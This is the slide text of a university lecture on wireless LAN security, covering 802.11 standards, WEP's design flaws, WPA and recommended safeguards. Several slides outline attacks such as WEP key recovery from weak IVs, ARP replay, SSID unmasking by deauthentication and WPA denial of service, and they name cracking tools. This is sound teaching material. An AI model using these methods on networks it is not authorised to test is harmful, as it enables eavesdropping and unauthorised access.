WLAN Security1 Wireless LAN Security Network Security Lecture 8.

WLAN Security 1

Wireless LAN Security

Network Security

Lecture 8

WLAN Security 2

WLAN Security - Contents

>Wireless LAN 802.11>Technology>Security History>Vulnerabilities>Demonstration

WLAN Security 3

Wireless LANs

>IEEE ratified 802.11 in 1997.>Also known as Wi-Fi.

>Wireless LAN at 1 Mbps & 2 Mbps.>WECA (Wireless Ethernet Compatibility

Alliance) promoted Interoperability.>Now Wi-Fi Alliance

>802.11 focuses on Layer 1 & Layer 2 of OSI model.>Physical layer>Data link layer

WLAN Security 4

802.11 Components

>Two pieces of equipment defined:>Wireless station

>A desktop or laptop PC or PDA with a wireless NIC.

>Access point>A bridge between wireless and wired networks>Composed of

> Radio> Wired network interface (usually 802.3)> Bridging software

>Aggregates access for multiple wireless stations to wired network.

WLAN Security 5

802.11 modes

> Infrastructure mode> Basic Service Set

> One access point

> Extended Service Set> Two or more BSSs forming a single subnet.

> Most corporate LANs in this mode.

> Ad-hoc mode> Also called peer-to-peer.> Independent Basic Service Set> Set of 802.11 wireless stations that communicate

directly without an access point.> Useful for quick & easy wireless networks.

WLAN Security 6

Infrastructure mode

Basic Service Set (BSS) – Single cell

Extended Service Set (ESS) – Multiple cells

Access Point

Station

WLAN Security 7

Ad-hoc mode

Independent Basic Service Set (IBSS)

WLAN Security 8

802.11 Physical Layer

>Originally three alternative physical layers>Two incompatible spread-spectrum radio in

2.4Ghz ISM band>Frequency Hopping Spread Spectrum (FHSS)

> 75 channels>Direct Sequence Spread Spectrum (DSSS)

> 14 channels (11 channels in US)

>One diffuse infrared layer

>802.11 speed>1 Mbps or 2 Mbps.

WLAN Security 9

802.11 Data Link Layer

> Layer 2 split into:> Logical Link Control (LLC).> Media Access Control (MAC).

> LLC - same 48-bit addresses as 802.3.> MAC - CSMA/CD not possible.

> Can’t listen for collision while transmitting.

> CSMA/CA – Collision Avoidance.> Sender waits for clear air, waits random time, then

sends data.> Receiver sends explicit ACK when data arrives intact.> Also handles interference.> But adds overhead.

> 802.11 always slower than equivalent 802.3.

WLAN Security 10

Hidden nodes

WLAN Security 11

RTS / CTS

>To handle hidden nodes>Sending station sends

>“Request to Send”

>Access point responds with >“Clear to Send”>All other stations hear this and delay any

transmissions.

>Only used for larger pieces of data.>When retransmission may waste significant

time.

WLAN Security 12

802.11b

> 802.11b ratified in 1999 adding 5.5 Mbps and 11 Mbps.

> DSSS as physical layer.> 11 channels (3 non-overlapping)

> Dynamic rate shifting.> Transparent to higher layers> Ideally 11 Mbps.> Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps.

> Higher ranges.> Interference.

> Shifts back up when possible.

> Maximum specified range 100 metres> Average throughput of 4Mbps

WLAN Security 13

Joining a BSS

>When 802.11 client enters range of one or more APs>APs send beacons.>AP beacon can include SSID.>AP chosen on signal strength and observed

error rates.>After AP accepts client.

>Client tunes to AP channel.

>Periodically, all channels surveyed.>To check for stronger or more reliable APs.>If found, reassociates with new AP.

WLAN Security 14

Access Point Roaming

Channel 4

Channel 7

Channel 9

Channel 1

WLAN Security 15

Roaming and Channels

>Reassociation with APs>Moving out of range.>High error rates.>High network traffic.

>Allows load balancing.

>Each AP has a channel.>14 partially overlapping channels.>Only three channels that have no overlap.

>Best for multicell coverage.

WLAN Security 16

802.11a

>802.11a ratified in 2001 >Supports up to 54Mbps in 5 Ghz range.

>Higher frequency limits the range>Regulated frequency reduces interference

from other devices

>12 non-overlapping channels>Usable range of 30 metres>Average throughput of 30 Mbps>Not backwards compatible

WLAN Security 17

802.11g

>802.11g ratified in 2002 >Supports up to 54Mbps in 2.4Ghz range.

>Backwards compatible with 802.11b

>3 non-overlapping channels>Range similar to 802.11b>Average throughput of 30 Mbps>802.11n due for November 2006

>Aiming for maximum 200Mbps with average 100Mbps

WLAN Security 18

Open System Authentication

>Service Set Identifier (SSID)>Station must specify SSID to Access

Point when requesting association.>Multiple APs with same SSID form

Extended Service Set.>APs can broadcast their SSID.>Some clients allow * as SSID.

>Associates with strongest AP regardless of SSID.

WLAN Security 19

MAC ACLs and SSID hiding

> Access points have Access Control Lists (ACL).> ACL is list of allowed MAC addresses.

> E.g. Allow access to:> 00:01:42:0E:12:1F> 00:01:42:F1:72:AE> 00:01:42:4F:E2:01

> But MAC addresses are sniffable and spoofable.

> AP Beacons without SSID> Essid_jack

> sends deauthenticate frames to client > SSID then displayed when client sends reauthenticate

frames

WLAN Security 20

Interception Range

Station outsidebuilding perimeter.

Basic Service Set (BSS) – Single cell

100 metres

WLAN Security 21

Interception

>Wireless LAN uses radio signal.>Not limited to physical building.>Signal is weakened by:

>Walls>Floors>Interference

>Directional antenna allows interception over longer distances.

WLAN Security 22

Directional Antenna

> Directional antenna provides focused reception.

> DIY plans available.> Aluminium cake tin> Chinese cooking sieve

> http://www.saunalahti.fi/~elepal/antennie.html> http://www.usbwifi.orcon.net.nz/

WLAN Security 23

WarDriving

> Software> Netstumbler> And many more

> Laptop> 802.11b,g or a PC card> Optional:

> Global Positioning System> Car, bicycle, boat…

> Logging of MAC address, network name, SSID, manufacturer, channel, signal strength, noise (GPS - location).

WLAN Security 24

WarDriving results

>San Francisco, 2001>Maximum 55 miles per hour.>1500 Access Points>60% in default configuration.>Most connected to internal backbones.>85% use Open System Authentication.

>Commercial directional antenna>25 mile range from hilltops.

> Peter Shipley - http://www.dis.org/filez/openlans.pdf

WLAN Security 25

WarDriving map Source: www.dis.org/wl/maps/

WLAN Security 26

Worldwide War Drive 2004

>Fourth WWWD>www.worldwidewaredrive.org

>228,537 Access points>82,755 (35%) with default SSID>140,890 (60%) with Open System

Authentication>62,859 (27%) with both, probably default

configuration

WLAN Security 27

Further issues

>Access Point configuration>Mixtures of SNMP, web, serial, telnet.

>Default community strings, default passwords.

>Evil Twin Access Points>Stronger signal, capture user

authentication.

>Renegade Access Points>Unauthorised wireless LANs.

WLAN Security 28

War Driving prosecutions

> February 2004, Texas, Stefan Puffer acquitted of wrongful access after showing an unprotected county WLAN to officials

> June 2004, North Carolina, Lowes DIY store> Botbyl convicted for stealing credit card numbers via

unprotected WLAN> Timmins convicted for checking email & web browsing via

unprotected WLAN

> June 2004, Connecticut, Myron Tereshchuk guilty of drive-by extortion via unprotected WLANs> “make the check payable to M.Tereshchuk”

> Sep 2004, Los Angeles, Nicholas Tombros guilty of drive-by spamming via unprotected WLANs

WLAN Security 29

802.11b Security Services

>Two security services provided:>Authentication

>Shared Key Authentication

>Encryption>Wired Equivalence Privacy

WLAN Security 30

Wired Equivalence Privacy

>Shared key between>Stations.>An Access Point.

>Extended Service Set>All Access Points will have same shared key.

>No key management>Shared key entered manually into

>Stations>Access points>Key management nightmare in large wireless

LANs

WLAN Security 31

RC4

>Ron’s Code number 4>Symmetric key encryption>RSA Security Inc.>Designed in 1987.>Trade secret until leak in 1994.

>RC4 can use key sizes from 1 bit to 2048 bits.

>RC4 generates a stream of pseudo random bits>XORed with plaintext to create ciphertext.

WLAN Security 32

WEP – Sending

> Compute Integrity Check Vector (ICV).> Provides integrity> 32 bit Cyclic Redundancy Check.> Appended to message to create plaintext.

> Plaintext encrypted via RC4> Provides confidentiality.> Plaintext XORed with long key stream of pseudo

random bits.> Key stream is function of

> 40-bit secret key> 24 bit initialisation vector

> Ciphertext is transmitted.

WLAN Security 33

WEP Encryption

RC4PRNG

32 bit CRC

IV

Ciphertext

||

||Plaintext

Secret key

InitialisationVector (IV) Key stream

WLAN Security 34

WEP – Receiving

>Ciphertext is received.>Ciphertext decrypted via RC4

>Ciphertext XORed with long key stream of pseudo random bits.

>Key stream is function of >40-bit secret key>24 bit initialisation vector (IV)

>Check ICV>Separate ICV from message.>Compute ICV for message>Compare with received ICV

WLAN Security 35

Shared Key Authentication

> When station requests association with Access Point> AP sends random number to station> Station encrypts random number

> Uses RC4, 40 bit shared secret key & 24 bit IV

> Encrypted random number sent to AP> AP decrypts received message

> Uses RC4, 40 bit shared secret key & 24 bit IV

> AP compares decrypted random number to transmitted random number

> If numbers match, station has shared secret key.

WLAN Security 36

WEP Safeguards

>Shared secret key required for:>Associating with an access point.>Sending data.>Receiving data.

>Messages are encrypted.>Confidentiality.

>Messages have checksum.>Integrity.

>But management traffic still broadcast in clear containing SSID.

WLAN Security 37

Initialisation Vector

>IV must be different for every message transmitted.

>802.11 standard doesn’t specify how IV is calculated.

>Wireless cards use several methods>Some use a simple ascending counter for

each message.>Some switch between alternate ascending

and descending counters.>Some use a pseudo random IV generator.

WLAN Security 38

Passive WEP attack

>If 24 bit IV is an ascending counter,>If Access Point transmits at 11 Mbps,>All IVs are exhausted in roughly 5 hours.>Passive attack:

>Attacker collects all traffic>Attacker could collect two messages:

>Encrypted with same key and same IV>Statistical attacks to reveal plaintext>Plaintext XOR Ciphertext = Keystream

WLAN Security 39

Active WEP attack

>If attacker knows plaintext and ciphertext pair>Keystream is known.>Attacker can create correctly encrypted

messages.>Access Point is deceived into accepting

messages.

>Bitflipping>Flip a bit in ciphertext>Bit difference in CRC-32 can be computed

WLAN Security 40

Limited WEP keys

>Some vendors allow limited WEP keys>User types in a passphrase>WEP key is generated from passphrase>Passphrases creates only 21 bits of entropy

in 40 bit key.>Reduces key strength to 21 bits = 2,097,152>Remaining 19 bits are predictable.>21 bit key can be brute forced in minutes.

>www.lava.net/~newsham/wlan/WEP_password_cracker.ppt

WLAN Security 41

Creating limited WEP keys

WLAN Security 42

Brute force key attack

>Capture ciphertext.>IV is included in message.

>Search all 240 possible secret keys.>1,099,511,627,776 keys>~170 days on a modern laptop

>Find which key decrypts ciphertext to plaintext.

WLAN Security 43

128 bit WEP

>Vendors have extended WEP to 128 bit keys.>104 bit secret key.>24 bit IV.

>Brute force takes 10^19 years for 104-bit key.

>Effectively safeguards against brute force attacks.

WLAN Security 44

Key Scheduling Weakness

>Paper from Fluhrer, Mantin, Shamir, 2001.

>Two weaknesses:>Certain keys leak into key stream.

>Invariance weakness.

>If portion of PRNG input is exposed, >Analysis of initial key stream allows key to be

determined.>IV weakness.

WLAN Security 45

IV weakness

> WEP exposes part of PRNG input.> IV is transmitted with message.> Every wireless frame has reliable first byte

> Sub-network Access Protocol header (SNAP) used in logical link control layer, upper sub-layer of data link layer.

> First byte is 0xAA> Attack is:

> Capture packets with weak IV> First byte ciphertext XOR 0xAA = First byte key stream> Can determine key from initial key stream

> Practical for 40 bit and 104 bit keys> Passive attack.

> Non-intrusive.> No warning.

WLAN Security 46

Wepcrack

>First tool to demonstrate attack using IV weakness.>Open source, Anton Rager.

>Three components>Weaker IV generator.>Search sniffer output for weaker IVs &

record 1st byte.>Cracker to combine weaker IVs and selected

1st bytes.

>Cumbersome.

WLAN Security 47

Airsnort

>Automated tool>Cypher42, Minnesota, USA.>Does it all!>Sniffs>Searches for weaker IVs>Records encrypted data>Until key is derived.

>100 Mb to 1 Gb of transmitted data.>3 to 4 hours on a very busy WLAN.

WLAN Security 48

Avoid the weak IVs

> FMS described a simple method to find weak IVs> Many manufacturers avoid those IVs after 2002> Therefore Airsnort and others may not work on recent

hardware

> However David Hulton aka h1kari> Properly implemented FMS attack which shows many

more weak IVs> Identified IVs that leak into second byte of key

stream.> Second byte of SNAP header is also 0xAA> So attack still works on recent hardware> And is faster on older hardware> Dwepcrack, weplab, aircrack

WLAN Security 49

Generating WEP traffic

>Not capturing enough traffic?>Capture encrypted ARP request packets>Anecdotally lengths of 68, 118 and 368

bytes appear appropriate>Replay encrypted ARP packets to generate

encrypted ARP replies>Aireplay implements this.

WLAN Security 50

802.11 safeguards

>Security Policy & Architecture Design>Treat as untrusted LAN>Discover unauthorised use>Access point audits>Station protection>Access point location>Antenna design

WLAN Security 51

Security Policy & Architecture

>Define use of wireless network>What is allowed >What is not allowed

>Holistic architecture and implementation >Consider all threats.>Design entire architecture

>To minimise risk.

WLAN Security 52

Wireless as untrusted LAN

>Treat wireless as untrusted.>Similar to Internet.

>Firewall between WLAN and Backbone.>Extra authentication required.>Intrusion Detection

>at WLAN / Backbone junction.

>Vulnerability assessments

WLAN Security 53

Discover unauthorised use

> Search for unauthorised access points, ad-hoc networks or clients.

> Port scanning> For unknown SNMP agents.> For unknown web or telnet interfaces.

> Warwalking!> Sniff 802.11 packets> Identify IP addresses> Detect signal strength> But may sniff your neighbours…

> Wireless Intrusion Detection> AirMagnet, AirDefense, Trapeze, Aruba,…

WLAN Security 54

Access point audits

>Review security of access points. >Are passwords and community strings

secure?>Use Firewalls & router ACLs

>Limit use of access point administration interfaces.

>Standard access point config:>SSID>WEP keys>Community string & password policy

WLAN Security 55

Station protection

> Personal firewalls> Protect the station from attackers.

> VPN from station into Intranet> End-to-end encryption into the trusted network.> But consider roaming issues.

> Host intrusion detection> Provide early warning of intrusions onto a station.

> Configuration scanning> Check that stations are securely configured.

WLAN Security 56

Location of Access Points

>Ideally locate access points>In centre of buildings.

>Try to avoid access points>By windows>On external walls>Line of sight to outside

>Use directional antenna to “point” radio signal.

WLAN Security 57

WPA

> Wi-Fi Protected Access> Works with 802.11b, a and g

> “Fixes” WEP’s problems> Existing hardware can be used> 802.1x user-level authentication> TKIP

> RC4 session-based dynamic encryption keys> Per-packet key derivation> Unicast and broadcast key management> New 48 bit IV with new sequencing method> Michael 8 byte message integrity code (MIC)

> Optional AES support to replace RC4

WLAN Security 58

WPA and 802.1x

> 802.1x is a general purpose network access control mechanism

> WPA has two modes> Pre-shared mode, uses pre-shared keys> Enterprise mode, uses Extensible Authentication

Protocol (EAP) with a RADIUS server making the authentication decision

> EAP is a transport for authentication, not authentication itself

> EAP allows arbitrary authentication methods> For example, Windows supports

> EAP-TLS requiring client and server certificates> PEAP-MS-CHAPv2

WLAN Security 59

Practical WPA attacks

>Dictionary attack on pre-shared key mode>CoWPAtty, Joshua Wright

>Denial of service attack>If WPA equipment sees two packets with

invalid MICs in 1 second>All clients are disassociated>All activity stopped for one minute>Two malicious packets a minute enough to stop a

wireless network

WLAN Security 60

802.11i

>Robust Security Network extends WPA>Counter Mode with Cipher Block Chaining

Message Authentication Code Protocol (CCMP)

>Based on a mode of AES, with 128 bits keys and 48 bit IV.

>Also adds dynamic negotiation of authentication and encryption algorithms

>Allows for future change

>Does require new hardware>www.drizzle.com/~aboba/IEEE/

WLAN Security 61

Relevant RFCs

>Radius Extensions: RFC 2869>EAP: RFC 2284>EAP-TLS: RFC 2716

WLAN Security 62

Demonstration

>War driving>Packet sniffing>Faking Aps>Cracking WEP

>brute force>Dictionary attack>FMS / H1kari attack

>Airsnarf?>Packet injection?